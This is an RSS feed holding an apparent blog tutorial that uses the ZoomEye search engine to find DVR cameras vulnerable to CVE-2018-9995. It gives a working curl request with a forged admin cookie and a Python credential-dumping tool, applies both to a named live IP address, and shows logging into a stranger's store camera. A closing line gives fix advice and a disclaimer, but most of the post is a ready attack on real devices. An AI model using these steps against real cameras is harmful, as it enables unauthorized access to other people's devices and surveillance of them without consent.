<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	 xmlns:media="http://search.yahoo.com/mrss/" >

<channel>
	<title>CVE20189995 &#8211; AnonyViet &#8211; English Version</title>
	<atom:link href="https://en.anonyviet.com/tag/cve20189995/feed/" rel="self" type="application/rss+xml" />
	<link>https://en.anonyviet.com</link>
	<description>The most popular website for sharing information technology, computer networks, and security knowledge. Stay up to date with the hottest news and tips</description>
	<lastBuildDate>Thu, 26 Jan 2023 02:56:00 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.0.1</generator>

<image>
	<url>https://en.anonyviet.com/wp-content/uploads/2023/01/cropped-ico-logo-75x75-1.png</url>
	<title>CVE20189995 &#8211; AnonyViet &#8211; English Version</title>
	<link>https://en.anonyviet.com</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Exercise: Using ZoomEye Hack Camera vulnerable to CVE-2018-9995</title>
		<link>https://en.anonyviet.com/exercise-using-zoomeye-hack-camera-vulnerable-to-cve-2018-9995/</link>
					<comments>https://en.anonyviet.com/exercise-using-zoomeye-hack-camera-vulnerable-to-cve-2018-9995/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Thu, 26 Jan 2023 02:56:00 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Camera]]></category>
		<category><![CDATA[CVE20189995]]></category>
		<category><![CDATA[Exercise]]></category>
		<category><![CDATA[Hack]]></category>
		<category><![CDATA[Vulnerable]]></category>
		<category><![CDATA[ZoomEye]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=3590</guid>

					<description><![CDATA[As in the previous post, I have About ZoomEye – Search engine for Hackers. Zoomeye is similar to Shodan but developed for the Chinese market. This is a search engine that just needs to enter an IP or a keyword, the results will show: open ports, related services, geographic location&#8230; Today we will try to [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div id="ftwp-postcontent">
<p><strong>As in the previous post, I have <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fzoomeye-cong-cu-tim-kiem-cua-hacker-chuyen-nghiep%2F" rel="noopener" class="local-link">About ZoomEye</a> – Search engine for Hackers.  Zoomeye is similar to Shodan but developed for the Chinese market.  This is a search engine that just needs to enter an IP or a keyword, the results will show: open ports, related services, geographic location&#8230; Today we will try to practice using ZoomEye to find the items. Camera is vulnerable to CVE-2018-9995 and access to view that Camera.</strong></p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<h2 id="ftoc-tim-camera-bi-lo-hong-cve-2018-9995-bang-zoomeye" class="ftwp-heading">Find Cameras with CVE-2018-9995 Vulnerability Using ZoomEye</h2>
<p><strong>This is a security vulnerability discovered in 2018 related to Camera DVR recorders.  With just a single command line, you can view the unencrypted Camera login account.  Currently in the world there are many Camera receivers that have not been patched with this version, and we can easily find them using the ZoomEye tool.</strong></p>
<p>Now we will practice with the ZoomEye search engine to find the camera with vulnerability CVE-2018-9995.</p>
<p>Open page <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwww.zoomeye.org%2F" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">ZoomEye</a> and type login.rsp to find IPs associated with this keyword.</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2021%2F07%2Fzoomeye-hack-camera.jpg" rel="noopener" class="local-link"><img fetchpriority="high" decoding="async" class="aligncenter size-full wp-image-29132" src="https://anonyviet.com/wp-content/uploads/2021/07/zoomeye-hack-camera.jpg" alt="zoomeye hack camera" width="1055" height="329" srcset="https://anonyviet.com/wp-content/uploads/2021/07/zoomeye-hack-camera.jpg 1055w, https://anonyviet.com/wp-content/uploads/2021/07/zoomeye-hack-camera-300x94.jpg 300w, https://anonyviet.com/wp-content/uploads/2021/07/zoomeye-hack-camera-1024x319.jpg 1024w, https://anonyviet.com/wp-content/uploads/2021/07/zoomeye-hack-camera-768x239.jpg 768w, https://anonyviet.com/wp-content/uploads/2021/07/zoomeye-hack-camera-750x234.jpg 750w" sizes="(max-width: 1055px) 100vw, 1055px" title="Exercise: Using ZoomEye Hack Camera Vulnerability CVE-2018-9995 11"/></a></p>
<p>The result will be a list of IP addresses, click on the black arrow to access those addresses.</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2021%2F07%2Fcach-dung-dung-zoomeye-1-1.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-29133" src="https://anonyviet.com/wp-content/uploads/2021/07/cach-dung-dung-zoomeye-1-1.jpg" alt="How to use zoomeye? " width="530" height="611" srcset="https://anonyviet.com/wp-content/uploads/2021/07/cach-dung-dung-zoomeye-1-1.jpg 530w, https://anonyviet.com/wp-content/uploads/2021/07/cach-dung-dung-zoomeye-1-1-260x300.jpg 260w" sizes="auto, (max-width: 530px) 100vw, 530px" title="Exercise: Using ZoomEye Hack Camera Vulnerable CVE-2018-9995 12"/></a></p>
<p>For example, we find the IP: <strong>http://59.18.152.180:9000</strong>.  Now I will exploit the vulnerability to find the user/password to log into this Camera.</p>
<h2 id="ftoc-dung-lenh-curl" class="ftwp-heading">Using the Curl . command</h2>
<p><strong>Use the syntax:</strong></p>
<p><code>curl "http://IP:Port/device.rsp?opt=user&amp;cmd=list" -H "Cookie: uid=admin"</code></p>
<p>Open CMD and use the following command:</p>
<p><code>curl "http://59.18.152.180:9000/device.rsp?opt=user&amp;cmd=list" -H "Cookie: uid=admin"</code></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2021%2F07%2Fhack-camera-CVE-2018-9995.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-29134" src="https://anonyviet.com/wp-content/uploads/2021/07/hack-camera-CVE-2018-9995.jpg" alt="hack camera CVE-2018-9995" width="1068" height="118" srcset="https://anonyviet.com/wp-content/uploads/2021/07/hack-camera-CVE-2018-9995.jpg 1068w, https://anonyviet.com/wp-content/uploads/2021/07/hack-camera-CVE-2018-9995-300x33.jpg 300w, https://anonyviet.com/wp-content/uploads/2021/07/hack-camera-CVE-2018-9995-1024x113.jpg 1024w, https://anonyviet.com/wp-content/uploads/2021/07/hack-camera-CVE-2018-9995-768x85.jpg 768w, https://anonyviet.com/wp-content/uploads/2021/07/hack-camera-CVE-2018-9995-750x83.jpg 750w" sizes="auto, (max-width: 1068px) 100vw, 1068px" title="Exercise: Using ZoomEye Hack Camera Vulnerability CVE-2018-9995 13"/></a></p>
<p>There are results: <strong>UID:</strong> is the username, and<strong> pwd:</strong> is the password.</p>
<p>You open the browser <strong>Internet Explorer</strong> Go up, access the hacked IP camera to log in to the camera driver.  Mind <strong>Enable ActiveX</strong> Please browse to see the image.</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2021%2F07%2Fdung-zoomeye-hack-cam.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-29135" src="https://anonyviet.com/wp-content/uploads/2021/07/dung-zoomeye-hack-cam.jpg" alt="Exercise: Using ZoomEye Hack Camera vulnerable to CVE-2018-9995 4" width="881" height="508" srcset="https://anonyviet.com/wp-content/uploads/2021/07/dung-zoomeye-hack-cam.jpg 881w, https://anonyviet.com/wp-content/uploads/2021/07/dung-zoomeye-hack-cam-300x173.jpg 300w, https://anonyviet.com/wp-content/uploads/2021/07/dung-zoomeye-hack-cam-768x443.jpg 768w, https://anonyviet.com/wp-content/uploads/2021/07/dung-zoomeye-hack-cam-750x432.jpg 750w" sizes="auto, (max-width: 881px) 100vw, 881px" title="Exercise: Using ZoomEye Hack Camera vulnerable to CVE-2018-9995 14"/></a></p>
<p>And this is the Camera of a certain store, in Korea.</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2021%2F07%2Fcamera-zoomeye-1-1-1.jpg" rel="noopener" class="local-link"><img post-id="3590" fifu-featured="1" decoding="async" loading="lazy" class="aligncenter size-full wp-image-29136" src="https://anonyviet.com/wp-content/uploads/2021/07/camera-zoomeye-1-1-1.jpg" alt="Exercise: Using ZoomEye Hack Camera vulnerable to CVE-2018-9995" title="Exercise: Using ZoomEye Hack Camera vulnerable to CVE-2018-9995" width="716" height="362" srcset="https://anonyviet.com/wp-content/uploads/2021/07/camera-zoomeye-1-1-1.jpg 716w, https://anonyviet.com/wp-content/uploads/2021/07/camera-zoomeye-1-1-1-300x152.jpg 300w" sizes="auto, (max-width: 716px) 100vw, 716px" title="Exercise: Using ZoomEye Hack Camera vulnerable to CVE-2018-9995 15"/></a></p>
<p>This is a python tool used to find the username/password of vulnerable cameras CVE-2018-9995.  Therefore, it is required that you have Python installed on your computer.  This tool can work on Windows.</p>
<p>You first <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fcodeload.github.com%2Fanonyvietofficial%2FCVE-2018-9995_dvr_credentials%2Fzip%2Frefs%2Fheads%2Fdev_tool" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Download Tool getDVR_Credentials</a>.  Extract to C: drive, open CMD to access the decompression path:</p>
<p><code>cd C:\CVE-2018-9995_dvr_credentials-dev_tool</code></p>
<p><code>pip install -r requirements</code></p>
<p><code>python getDVR_Credentials.py --host IP --port Port</code>  // IP and Port of Camera.</p>
<p>For the above example, we will type the command</p>
<p><code>python getDVR_Credentials.py --host 59.18.152.180 --port 9000</code></p>
<p>And this is the result:</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2021%2F07%2Fhack-camera.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter wp-image-29137 size-full" src="https://anonyviet.com/wp-content/uploads/2021/07/hack-camera.jpg" alt="hack camera CVE-2018-9995" width="1511" height="539" srcset="https://anonyviet.com/wp-content/uploads/2021/07/hack-camera.jpg 1511w, https://anonyviet.com/wp-content/uploads/2021/07/hack-camera-300x107.jpg 300w, https://anonyviet.com/wp-content/uploads/2021/07/hack-camera-1024x365.jpg 1024w, https://anonyviet.com/wp-content/uploads/2021/07/hack-camera-768x274.jpg 768w, https://anonyviet.com/wp-content/uploads/2021/07/hack-camera-750x268.jpg 750w, https://anonyviet.com/wp-content/uploads/2021/07/hack-camera-1140x407.jpg 1140w" sizes="auto, (max-width: 1511px) 100vw, 1511px" title="Exercise: Using ZoomEye Hack Camera vulnerable to CVE-2018-9995 16"/></a></p>
<p><strong>How to fix vulnerability CVE-2018-9995:</strong> Change the login account and update the Camera to the latest Firmware.</p>
<p><strong>When you find that the camera is flawed, try to notify the owner so they can contact a technician to handle it.</strong></p>
<p><em>Although considered a &#8220;hacker-friendly&#8221; search engine, ZoomEye is not designed to initiate attacks on network devices or websites.  The data recorded is for security research only. And this article is mainly for research purposes, please do not use it to break the law.</em></p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;29130&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/exercise-using-zoomeye-hack-camera-vulnerable-to-cve-2018-9995/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2021/07/camera-zoomeye-1-1-1.jpg" medium="image"></media:content>
            	</item>
	</channel>
</rss>
